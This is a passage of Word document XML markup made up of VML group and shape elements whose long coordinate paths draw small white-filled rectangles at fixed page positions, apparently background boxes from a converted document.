,13756,4604,13756,4604,13756,4603,13756,4602,13756,4602,13756,4601,13756,4600,13756,4599,13756,4599,13756,4598,13756,4597,13756,4596,13756,4595,13756,4594,13756,4593,13756,4592,13756,4591,13756,4590,13756,4589,13756,4587,13756,4586,13756,4585,13756,4584,13756,4583,13756,4581,13756,4580,13756,4578,13756,4577,13756,4576,13756,4574,13756,4573,13756,4571,13756,4569,13756,4568,13756,4566,13756,4564,13756,4563,13756,4561,13756,4559,13756,4557,13756,4555,13756,4553,13756,4551,13756,4549,13756,4547,13756,4545,13756,4543,13756,4541,13756,4538,13756,4536,13756,4534,13756,4531,13756,4529,13756,4527,13756,4524,13756,4521,13756,4519,13756,4516,13756,4514,13756,4511,13756,4508,13756,4505,13756,4502,13756,4499,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13756,4496,13755,4496,13755,4496,13755,4496,13755,4496,13755,4496,13755,4496,13755,4496,13754,4496,13754,4496,13754,4496,13754,4496,13753,4496,13753,4496,13753,4496,13752,4496,13752,4496,13751,4496,13751,4496,13750,4496,13750,4496,13749,4496,13749,4496,13748,4496,13748,4496,13747,4496,13746,4496,13745,4496,13745,4496,13744,4496,13743,4496,13742,4496,13741,4496,13740,4496,13739,4496,13738,4496,13737,4496,13736,4496,13735,4496,13733,4496,13732,4496,13731,4496,13729,4496,13728,4496,13726,4496,13725,4496,13723,4496,13722,4496,13720,4496,13718,4496,13716,4496,13714,4496,13712,4496,13710,4496,13708,4496,13706,4496,13704,4496,13702,4496,13699,4496,13697,4496,13695,4496,13692,4496,13689,4496,13687,4496,13684,4496,13681,4496,13678,4496,13675,4496,13672,4496,13669,4496,13666,4496,13663,4496,13660,4496,13656,4496,13653,4496,13649,4496,13646,4496,13642,4496,13638,4496,13634,4496,13630,4496,13626,4496,13622,4496,13618,4496,13613,4496,13609,4496,13605,4496,13600,4496,13595,4496,13590,4496,13586,4496,13581,4496,13576,4496,13570,4496,13565,4496,13560,4496,13554,4496,13549,4496,13543,4496,13537,4496,13532,4496,13526,4496,13520,4496,13513,4496,13507,4496,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:229.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4590,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:4590;top:13490;width:130;height:250" coordorigin="4590,13490" coordsize="130,250" path="m4616,13501l4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4616,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4617,13501,4618,13501,4618,13501,4618,13501,4618,13501,4618,13501,4618,13501,4619,13501,4619,13501,4619,13501,4619,13501,4620,13501,4620,13501,4620,13501,4621,13501,4621,13501,4621,13501,4622,13501,4622,13501,4622,13501,4623,13501,4623,13501,4624,13501,4624,13501,4625,13501,4625,13501,4626,13501,4626,13501,4627,13501,4628,13501,4628,13501,4629,13501,4630,13501,4630,13501,4631,13501,4632,13501,4632,13501,4633,13501,4634,13501,4635,13501,4636,13501,4637,13501,4638,13501,4639,13501,4640,13501,4641,13501,4642,13501,4643,13501,4644,13501,4645,13501,4646,13501,4648,13501,4649,13501,4650,13501,4651,13501,4653,13501,4654,13501,4656,13501,4657,13501,4659,13501,4660,13501,4662,13501,4663,13501,4665,13501,4667,13501,4668,13501,4670,13501,4672,13501,4674,13501,4676,13501,4677,13501,4679,13501,4681,13501,4683,13501,4685,13501,4688,13501,4690,13501,4692,13501,4694,13501,4696,13501,4699,13501,4701,13501,4704,13501,4706,13501,4709,13501,4711,13501,4714,13501,4716,13501,4719,13501,4722,13501,4725,13501,4728,13501,4730,13501,4733,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13502,4736,13502,4736,13502,4736,13502,4736,13502,4736,13502,4736,13503,4736,13503,4736,13503,4736,13503,4736,13504,4736,13504,4736,13504,4736,13505,4736,13505,4736,13506,4736,13506,4736,13507,4736,13507,4736,13508,4736,13508,4736,13509,4736,13510,4736,13510,4736,13511,4736,13512,4736,13513,4736,13514,4736,13515,4736,13516,4736,13517,4736,13518,4736,13519,4736,13520,4736,13521,4736,13522,4736,13523,4736,13525,4736,13526,4736,13527,4736,13529,4736,13530,4736,13532,4736,13533,4736,13535,4736,13537,4736,13539,4736,13540,4736,13542,4736,13544,4736,13546,4736,13548,4736,13551,4736,13553,4736,13555,4736,13557,4736,13560,4736,13562,4736,13565,4736,13567,4736,13570,4736,13573,4736,13575,4736,13578,4736,13581,4736,13584,4736,13587,4736,13591,4736,13594,4736,13597,4736,13600,4736,13604,4736,13608,4736,13611,4736,13615,4736,13619,4736,13623,4736,13627,4736,13631,4736,13635,4736,13639,4736,13643,4736,13648,4736,13652,4736,13657,4736,13661,4736,13666,4736,13671,4736,13676,4736,13681,4736,13686,4736,13692,4736,13697,4736,13702,4736,13708,4736,13713,4736,13719,4736,13725,4736,13731,4736,13737,4736,13743,4736,13750,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4735,13756,4735,13756,4735,13756,4735,13756,4735,13756,4735,13756,4734,13756,4734,13756,4734,13756,4734,13756,4734,13756,4733,13756,4733,13756,4733,13756,4732,13756,4732,13756,4732,13756,4731,13756,4731,13756,4731,13756,4730,13756,4730,13756,4729,13756,4729,13756,4729,13756,4728,13756,4727,13756,4727,13756,4726,13756,4726,13756,4725,13756,4725,13756,4724,13756,4723,13756,4722,13756,4722,13756,4721,13756,4720,13756,4719,13756,4719,13756,4718,13756,4717,13756,4716,13756,4715,13756,4714,13756,4713,13756,4712,13756,4711,13756,4710,13756,4709,13756,4708,13756,4706,13756,4705,13756,4704,13756,4703,13756,4701,13756,4700,13756,4699,13756,4697,13756,4696,13756,4694,13756,4693,13756,4691,13756,4689,13756,4688,13756,4686,13756,4684,13756,4683,13756,4681,13756,4679,13756,4677,13756,4675,13756,4673,13756,4671,13756,4669,13756,4667,13756,4665,13756,4663,13756,4661,13756,4659,13756,4656,13756,4654,13756,4652,13756,4649,13756,4647,13756,4644,13756,4642,13756,4639,13756,4636,13756,4634,13756,4631,13756,4628,13756,4625,13756,4622,13756,4619,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13756,4616,13755,4616,13755,4616,13755,4616,13755,4616,13755,4616,13755,4616,13755,4616,13754,4616,13754,4616,13754,4616,13754,4616,13753,4616,13753,4616,13753,4616,13752,4616,13752,4616,13751,4616,13751,4616,13750,4616,13750,4616,13749,4616,13749,4616,13748,4616,13748,4616,13747,4616,13746,4616,13745,4616,13745,4616,13744,4616,13743,4616,13742,4616,13741,4616,13740,4616,13739,4616,13738,4616,13737,4616,13736,4616,13735,4616,13733,4616,13732,4616,13731,4616,13729,4616,13728,4616,13726,4616,13725,4616,13723,4616,13722,4616,13720,4616,13718,4616,13716,4616,13714,4616,13712,4616,13710,4616,13708,4616,13706,4616,13704,4616,13702,4616,13699,4616,13697,4616,13695,4616,13692,4616,13689,4616,13687,4616,13684,4616,13681,4616,13678,4616,13675,4616,13672,4616,13669,4616,13666,4616,13663,4616,13660,4616,13656,4616,13653,4616,13649,4616,13646,4616,13642,4616,13638,4616,13634,4616,13630,4616,13626,4616,13622,4616,13618,4616,13613,4616,13609,4616,13605,4616,13600,4616,13595,4616,13590,4616,13586,4616,13581,4616,13576,4616,13570,4616,13565,4616,13560,4616,13554,4616,13549,4616,13543,4616,13537,4616,13532,4616,13526,4616,13520,4616,13513,4616,13507,4616,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:13490;width:130;height:250" coordorigin="4710,13490" coordsize="130,250" path="m4736,13501l4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4736,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4737,13501,4738,13501,4738,13501,4738,13501,4738,13501,4738,13501,4739,13501,4739,13501,4739,13501,4739,13501,4739,13501,4740,13501,4740,13501,4740,13501,4741,13501,4741,13501,4741,13501,4742,13501,4742,13501,4742,13501,4743,13501,4743,13501,4744,13501,4744,13501,4745,13501,4745,13501,4746,13501,4746,13501,4747,13501,4748,13501,4748,13501,4749,13501,4750,13501,4750,13501,4751,13501,4752,13501,4753,13501,4753,13501,4754,13501,4755,13501,4756,13501,4757,13501,4758,13501,4759,13501,4760,13501,4761,13501,4762,13501,4763,13501,4764,13501,4765,13501,4766,13501,4768,13501,4769,13501,4770,13501,4772,13501,4773,13501,4774,13501,4776,13501,4777,13501,4779,13501,4780,13501,4782,13501,4783,13501,4785,13501,4787,13501,4788,13501,4790,13501,4792,13501,4794,13501,4796,13501,4797,13501,4799,13501,4801,13501,4803,13501,4806,13501,4808,13501,4810,13501,4812,13501,4814,13501,4817,13501,4819,13501,4821,13501,4824,13501,4826,13501,4829,13501,4831,13501,4834,13501,4836,13501,4839,13501,4842,13501,4845,13501,4848,13501,4850,13501,4853,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13502,4856,13502,4856,13502,4856,13502,4856,13502,4856,13502,4856,13503,4856,13503,4856,13503,4856,13503,4856,13504,4856,13504,4856,13504,4856,13505,4856,13505,4856,13506,4856,13506,4856,13507,4856,13507,4856,13508,4856,13508,4856,13509,4856,13510,4856,13510,4856,13511,4856,13512,4856,13513,4856,13514,4856,13515,4856,13516,4856,13517,4856,13518,4856,13519,4856,13520,4856,13521,4856,13522,4856,13523,4856,13525,4856,13526,4856,13527,4856,13529,4856,13530,4856,13532,4856,13533,4856,13535,4856,13537,4856,13539,4856,13540,4856,13542,4856,13544,4856,13546,4856,13548,4856,13551,4856,13553,4856,13555,4856,13557,4856,13560,4856,13562,4856,13565,4856,13567,4856,13570,4856,13573,4856,13575,4856,13578,4856,13581,4856,13584,4856,13587,4856,13591,4856,13594,4856,13597,4856,13600,4856,13604,4856,13608,4856,13611,4856,13615,4856,13619,4856,13623,4856,13627,4856,13631,4856,13635,4856,13639,4856,13643,4856,13648,4856,13652,4856,13657,4856,13661,4856,13666,4856,13671,4856,13676,4856,13681,4856,13686,4856,13692,4856,13697,4856,13702,4856,13708,4856,13713,4856,13719,4856,13725,4856,13731,4856,13737,4856,13743,4856,13750,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4855,13756,4855,13756,4855,13756,4855,13756,4855,13756,4855,13756,4855,13756,4854,13756,4854,13756,4854,13756,4854,13756,4853,13756,4853,13756,4853,13756,4853,13756,4852,13756,4852,13756,4852,13756,4851,13756,4851,13756,4850,13756,4850,13756,4850,13756,4849,13756,4849,13756,4848,13756,4848,13756,4847,13756,4846,13756,4846,13756,4845,13756,4845,13756,4844,13756,4843,13756,4843,13756,4842,13756,4841,13756,4840,13756,4839,13756,4839,13756,4838,13756,4837,13756,4836,13756,4835,13756,4834,13756,4833,13756,4832,13756,4831,13756,4830,13756,4829,13756,4828,13756,4826,13756,4825,13756,4824,13756,4823,13756,4821,13756,4820,13756,4819,13756,4817,13756,4816,13756,4814,13756,4813,13756,4811,13756,4810,13756,4808,13756,4806,13756,4805,13756,4803,13756,4801,13756,4799,13756,4797,13756,4795,13756,4793,13756,4791,13756,4789,13756,4787,13756,4785,13756,4783,13756,4781,13756,4779,13756,4776,13756,4774,13756,4772,13756,4769,13756,4767,13756,4764,13756,4762,13756,4759,13756,4756,13756,4754,13756,4751,13756,4748,13756,4745,13756,4742,13756,4739,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13756,4736,13755,4736,13755,4736,13755,4736,13755,4736,13755,4736,13755,4736,13755,4736,13754,4736,13754,4736,13754,4736,13754,4736,13753,4736,13753,4736,13753,4736,13752,4736,13752,4736,13751,4736,13751,4736,13750,4736,13750,4736,13749,4736,13749,4736,13748,4736,13748,4736,13747,4736,13746,4736,13745,4736,13745,4736,13744,4736,13743,4736,13742,4736,13741,4736,13740,4736,13739,4736,13738,4736,13737,4736,13736,4736,13735,4736,13733,4736,13732,4736,13731,4736,13729,4736,13728,4736,13726,4736,13725,4736,13723,4736,13722,4736,13720,4736,13718,4736,13716,4736,13714,4736,13712,4736,13710,4736,13708,4736,13706,4736,13704,4736,13702,4736,13699,4736,13697,4736,13695,4736,13692,4736,13689,4736,13687,4736,13684,4736,13681,4736,13678,4736,13675,4736,13672,4736,13669,4736,13666,4736,13663,4736,13660,4736,13656,4736,13653,4736,13649,4736,13646,4736,13642,4736,13638,4736,13634,4736,13630,4736,13626,4736,13622,4736,13618,4736,13613,4736,13609,4736,13605,4736,13600,4736,13595,4736,13590,4736,13586,4736,13581,4736,13576,4736,13570,4736,13565,4736,13560,4736,13554,4736,13549,4736,13543,4736,13537,4736,13532,4736,13526,4736,13520,4736,13513,4736,13507,4736,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:4830;top:13490;width:130;height:250" coordorigin="4830,13490" coordsize="130,250" path="m4856,13501l4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4856,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4857,13501,4858,13501,4858,13501,4858,13501,4858,13501,4858,13501,4858,13501,4859,13501,4859,13501,4859,13501,4859,13501,4860,13501,4860,13501,4860,13501,4860,13501,4861,13501,4861,13501,4861,13501,4862,13501,4862,13501,4863,13501,4863,13501,4863,13501,4864,13501,4864,13501,4865,13501,4865,13501,4866,13501,4866,13501,4867,13501,4868,13501,4868,13501,4869,13501,4870,13501,4870,13501,4871,13501,4872,13501,4873,13501,4873,13501,4874,13501,4875,13501,4876,13501,4877,13501,4878,13501,4879,13501,4880,13501,4881,13501,4882,13501,4883,13501,4884,13501,4885,13501,4887,13501,4888,13501,4889,13501,4890,13501,4892,13501,4893,13501,4894,13501,4896,13501,4897,13501,4899,13501,4900,13501,4902,13501,4903,13501,4905,13501,4907,13501,4908,13501,4910,13501,4912,13501,4914,13501,4916,13501,4918,13501,4919,13501,4921,13501,4924,13501,4926,13501,4928,13501,4930,13501,4932,13501,4934,13501,4937,13501,4939,13501,4941,13501,4944,13501,4946,13501,4949,13501,4951,13501,4954,13501,4957,13501,4959,13501,4962,13501,4965,13501,4968,13501,4971,13501,4974,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13502,4977,13502,4977,13502,4977,13502,4977,13502,4977,13502,4977,13503,4977,13503,4977,13503,4977,13503,4977,13504,4977,13504,4977,13504,4977,13505,4977,13505,4977,13506,4977,13506,4977,13507,4977,13507,4977,13508,4977,13508,4977,13509,4977,13510,4977,13510,4977,13511,4977,13512,4977,13513,4977,13514,4977,13515,4977,13516,4977,13517,4977,13518,4977,13519,4977,13520,4977,13521,4977,13522,4977,13523,4977,13525,4977,13526,4977,13527,4977,13529,4977,13530,4977,13532,4977,13533,4977,13535,4977,13537,4977,13539,4977,13540,4977,13542,4977,13544,4977,13546,4977,13548,4977,13551,4977,13553,4977,13555,4977,13557,4977,13560,4977,13562,4977,13565,4977,13567,4977,13570,4977,13573,4977,13575,4977,13578,4977,13581,4977,13584,4977,13587,4977,13591,4977,13594,4977,13597,4977,13600,4977,13604,4977,13608,4977,13611,4977,13615,4977,13619,4977,13623,4977,13627,4977,13631,4977,13635,4977,13639,4977,13643,4977,13648,4977,13652,4977,13657,4977,13661,4977,13666,4977,13671,4977,13676,4977,13681,4977,13686,4977,13692,4977,13697,4977,13702,4977,13708,4977,13713,4977,13719,4977,13725,4977,13731,4977,13737,4977,13743,4977,13750,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4976,13756,4975,13756,4975,13756,4975,13756,4975,13756,4975,13756,4975,13756,4974,13756,4974,13756,4974,13756,4974,13756,4973,13756,4973,13756,4973,13756,4973,13756,4972,13756,4972,13756,4972,13756,4971,13756,4971,13756,4970,13756,4970,13756,4970,13756,4969,13756,4969,13756,4968,13756,4968,13756,4967,13756,4966,13756,4966,13756,4965,13756,4965,13756,4964,13756,4963,13756,4963,13756,4962,13756,4961,13756,4960,13756,4960,13756,4959,13756,4958,13756,4957,13756,4956,13756,4955,13756,4954,13756,4953,13756,4952,13756,4951,13756,4950,13756,4949,13756,4948,13756,4946,13756,4945,13756,4944,13756,4943,13756,4941,13756,4940,13756,4939,13756,4937,13756,4936,13756,4934,13756,4933,13756,4931,13756,4930,13756,4928,13756,4926,13756,4925,13756,4923,13756,4921,13756,4919,13756,4917,13756,4915,13756,4913,13756,4911,13756,4909,13756,4907,13756,4905,13756,4903,13756,4901,13756,4899,13756,4896,13756,4894,13756,4892,13756,4889,13756,4887,13756,4884,13756,4882,13756,4879,13756,4876,13756,4874,13756,4871,13756,4868,13756,4865,13756,4862,13756,4859,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13756,4856,13755,4856,13755,4856,13755,4856,13755,4856,13755,4856,13755,4856,13755,4856,13754,4856,13754,4856,13754,4856,13754,4856,13753,4856,13753,4856,13753,4856,13752,4856,13752,4856,13751,4856,13751,4856,13750,4856,13750,4856,13749,4856,13749,4856,13748,4856,13748,4856,13747,4856,13746,4856,13745,4856,13745,4856,13744,4856,13743,4856,13742,4856,13741,4856,13740,4856,13739,4856,13738,4856,13737,4856,13736,4856,13735,4856,13733,4856,13732,4856,13731,4856,13729,4856,13728,4856,13726,4856,13725,4856,13723,4856,13722,4856,13720,4856,13718,4856,13716,4856,13714,4856,13712,4856,13710,4856,13708,4856,13706,4856,13704,4856,13702,4856,13699,4856,13697,4856,13695,4856,13692,4856,13689,4856,13687,4856,13684,4856,13681,4856,13678,4856,13675,4856,13672,4856,13669,4856,13666,4856,13663,4856,13660,4856,13656,4856,13653,4856,13649,4856,13646,4856,13642,4856,13638,4856,13634,4856,13630,4856,13626,4856,13622,4856,13618,4856,13613,4856,13609,4856,13605,4856,13600,4856,13595,4856,13590,4856,13586,4856,13581,4856,13576,4856,13570,4856,13565,4856,13560,4856,13554,4856,13549,4856,13543,4856,13537,4856,13532,4856,13526,4856,13520,4856,13513,4856,13507,4856,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:247.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4950,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:4950;top:13490;width:130;height:250" coordorigin="4950,13490" coordsize="130,250" path="m4977,13501l4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4977,13501,4978,13501,4978,13501,4978,13501,4978,13501,4978,13501,4978,13501,4979,13501,4979,13501,4979,13501,4979,13501,4980,13501,4980,13501,4980,13501,4980,13501,4981,13501,4981,13501,4981,13501,4982,13501,4982,13501,4983,13501,4983,13501,4983,13501,4984,13501,4984,13501,4985,13501,4985,13501,4986,13501,4987,13501,4987,13501,4988,13501,4988,13501,4989,13501,4990,13501,4990,13501,4991,13501,4992,13501,4993,13501,4993,13501,4994,13501,4995,13501,4996,13501,4997,13501,4998,13501,4999,13501,5000,13501,5001,13501,5002,13501,5003,13501,5004,13501,5005,13501,5007,13501,5008,13501,5009,13501,5010,13501,5012,13501,5013,13501,5014,13501,5016,13501,5017,13501,5019,13501,5020,13501,5022,13501,5023,13501,5025,13501,5027,13501,5028,13501,5030,13501,5032,13501,5034,13501,5036,13501,5038,13501,5040,13501,5042,13501,5044,13501,5046,13501,5048,13501,5050,13501,5052,13501,5054,13501,5057,13501,5059,13501,5061,13501,5064,13501,5066,13501,5069,13501,5071,13501,5074,13501,5077,13501,5079,13501,5082,13501,5085,13501,5088,13501,5091,13501,5094,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13502,5097,13502,5097,13502,5097,13502,5097,13502,5097,13502,5097,13503,5097,13503,5097,13503,5097,13503,5097,13504,5097,13504,5097,13504,5097,13505,5097,13505,5097,13506,5097,13506,5097,13507,5097,13507,5097,13508,5097,13508,5097,13509,5097,13510,5097,13510,5097,13511,5097,13512,5097,13513,5097,13514,5097,13515,5097,13516,5097,13517,5097,13518,5097,13519,5097,13520,5097,13521,5097,13522,5097,13523,5097,13525,5097,13526,5097,13527,5097,13529,5097,13530,5097,13532,5097,13533,5097,13535,5097,13537,5097,13539,5097,13540,5097,13542,5097,13544,5097,13546,5097,13548,5097,13551,5097,13553,5097,13555,5097,13557,5097,13560,5097,13562,5097,13565,5097,13567,5097,13570,5097,13573,5097,13575,5097,13578,5097,13581,5097,13584,5097,13587,5097,13591,5097,13594,5097,13597,5097,13600,5097,13604,5097,13608,5097,13611,5097,13615,5097,13619,5097,13623,5097,13627,5097,13631,5097,13635,5097,13639,5097,13643,5097,13648,5097,13652,5097,13657,5097,13661,5097,13666,5097,13671,5097,13676,5097,13681,5097,13686,5097,13692,5097,13697,5097,13702,5097,13708,5097,13713,5097,13719,5097,13725,5097,13731,5097,13737,5097,13743,5097,13750,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5097,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5096,13756,5095,13756,5095,13756,5095,13756,5095,13756,5095,13756,5095,13756,5094,13756,5094,13756,5094,13756,5094,13756,5094,13756,5093,13756,5093,13756,5093,13756,5092,13756,5092,13756,5092,13756,5091,13756,5091,13756,5090,13756,5090,13756,5090,13756,5089,13756,5089,13756,5088,13756,5088,13756,5087,13756,5087,13756,5086,13756,5085,13756,5085,13756,5084,13756,5083,13756,5083,13756,5082,13756,5081,13756,5080,13756,5080,13756,5079,13756,5078,13756,5077,13756,5076,13756,5075,13756,5074,13756,5073,13756,5072,13756,5071,13756,5070,13756,5069,13756,5068,13756,5067,13756,5065,13756,5064,13756,5063,13756,5061,13756,5060,13756,5059,13756,5057,13756,5056,13756,5054,13756,5053,13756,5051,13756,5050,13756,5048,13756,5046,13756,5045,13756,5043,13756,5041,13756,5039,13756,5037,13756,5035,13756,5034,13756,5032,13756,5030,13756,5027,13756,5025,13756,5023,13756,5021,13756,5019,13756,5016,13756,5014,13756,5012,13756,5009,13756,5007,13756,5004,13756,5002,13756,4999,13756,4996,13756,4994,13756,4991,13756,4988,13756,4985,13756,4982,13756,4980,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13756,4977,13755,4977,13755,4977,13755,4977,13755,4977,13755,4977,13755,4977,13755,4977,13754,4977,13754,4977,13754,4977,13754,4977,13753,4977,13753,4977,13753,4977,13752,4977,13752,4977,13751,4977,13751,4977,13750,4977,13750,4977,13749,4977,13749,4977,13748,4977,13748,4977,13747,4977,13746,4977,13745,4977,13745,4977,13744,4977,13743,4977,13742,4977,13741,4977,13740,4977,13739,4977,13738,4977,13737,4977,13736,4977,13735,4977,13733,4977,13732,4977,13731,4977,13729,4977,13728,4977,13726,4977,13725,4977,13723,4977,13722,4977,13720,4977,13718,4977,13716,4977,13714,4977,13712,4977,13710,4977,13708,4977,13706,4977,13704,4977,13702,4977,13699,4977,13697,4977,13695,4977,13692,4977,13689,4977,13687,4977,13684,4977,13681,4977,13678,4977,13675,4977,13672,4977,13669,4977,13666,4977,13663,4977,13660,4977,13656,4977,13653,4977,13649,4977,13646,4977,13642,4977,13638,4977,13634,4977,13630,4977,13626,4977,13622,4977,13618,4977,13613,4977,13609,4977,13605,4977,13600,4977,13595,4977,13590,4977,13586,4977,13581,4977,13576,4977,13570,4977,13565,4977,13560,4977,13554,4977,13549,4977,13543,4977,13537,4977,13532,4977,13526,4977,13520,4977,13513,4977,13507,4977,13501e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:253.500pt;margin-top:674.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5070,13490" coordsize="130,250">
        <v:shape style="position:absolute;left:5070;top:13490;width:130;height:250" coordorigin="5070,13490" coordsize="130,250" path="m5097,13501l5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5097,13501,5098,13501,5098,13501,5098,13501,5098,13501,5098,13501,5098,13501,5098,13501,5099,13501,5099,13501,5099,13501,5099,13501,5100,13501,5100,13501,5100,13501,5100,13501,5101,13501,5101,13501,5101,13501,5102,13501,5102,13501,5103,13501,5103,13501,5104,13501,5104,13501,5104,13501,5105,13501,5105,13501,5106,13501,5107,13501,5107,13501,5108,13501,5108,13501,5109,13501,5110,13501,5110,13501,5111,13501,5112,13501,5113,13501,5114,13501,5114,13501,5115,13501,5116,13501,5117,13501,5118,13501,5119,13501,5120,13501,5121,13501,5122,13501,5123,13501,5124,13501,5125,13501,5127,13501,5128,13501,5129,13501,5130,13501,5132,13501,5133,13501,5134,13501,5136,13501,5137,13501,5139,13501,5140,13501,5142,13501,5143,13501,5145,13501,5147,13501,5149,13501,5150,13501,5152,13501,5154,13501,5156,13501,5158,13501,5160,13501,5162,13501,5164,13501,5166,13501,5168,13501,5170,13501,5172,13501,5174,13501,5177,13501,5179,13501,5181,13501,5184,13501,5186,13501,5189,13501,5191,13501,5194,13501,5197,13501,5199,13501,5202,13501,5205,13501,5208,13501,5211,13501,5214,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13501,5217,13502,5217,13502,5217,13502,5217,13502,5217,13502,5217,13502,5217,13503,5217,13503,5217,13503,5217,13503,5217,13504,5217,13504,5217,13504,5217,13505,5217,13505,5217,13506,5217,13506,5217,13507,5217,13507,5217,13508,5217,13508,5217,13509,5217,13510,5217,13510,5217,13511,5217,13512,5217,13513,5217,13514,5217,13515,5217,13516,5217,13517,5217,13518,5217,13519,5217,13520,5217,13521,5217,13522,5217,13523,5217,13525,5217,13526,5217,13527,5217,13529,5217,13530,5217,13532,5217,13533,5217,13535,5217,13537,5217,13539,5217,13540,5217,13542,5217,13544,5217,13546,5217,13548,5217,13551,5217,13553,5217,13555,5217,13557,5217,13560,5217,13562,5217,13565,